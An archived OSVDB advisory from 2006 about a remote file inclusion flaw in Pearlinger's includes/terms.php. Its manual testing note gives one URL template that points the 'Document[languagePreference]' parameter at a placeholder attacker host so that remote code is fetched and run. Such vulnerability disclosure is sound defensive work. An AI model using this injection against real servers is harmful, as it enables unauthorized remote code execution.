Pearlinger Multiple Product terms.php Document[languagePreference] Variable Remote File Inclusion

2006-07-02T07:04:08
ID OSVDB:27200
Type osvdb
Reporter zero(xzerox@linuxmail.org)
Modified 2006-07-02T07:04:08

Description

Vulnerability Description

Pearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/terms.php script not properly sanitizing user input supplied to the 'Document[languagePreference]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Pearlinger Multiple Products contain a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the includes/terms.php script not properly sanitizing user input supplied to the 'Document[languagePreference]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/includes/terms.php?Document[languagePreference]=[attacker]

References:

Vendor URL: http://pearlforums.sourceforge.net/ Secunia Advisory ID:20819 Related OSVDB ID: 27179 Related OSVDB ID: 27180 Related OSVDB ID: 27181 Related OSVDB ID: 27182 Related OSVDB ID: 27184 Related OSVDB ID: 27185 Related OSVDB ID: 27192 Related OSVDB ID: 27195 Related OSVDB ID: 27196 Related OSVDB ID: 27201 Related OSVDB ID: 27188 Related OSVDB ID: 27194 Related OSVDB ID: 27191 Related OSVDB ID: 27197 Related OSVDB ID: 27186 Related OSVDB ID: 27187 Related OSVDB ID: 27193 Related OSVDB ID: 27198 Related OSVDB ID: 27199 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0026.html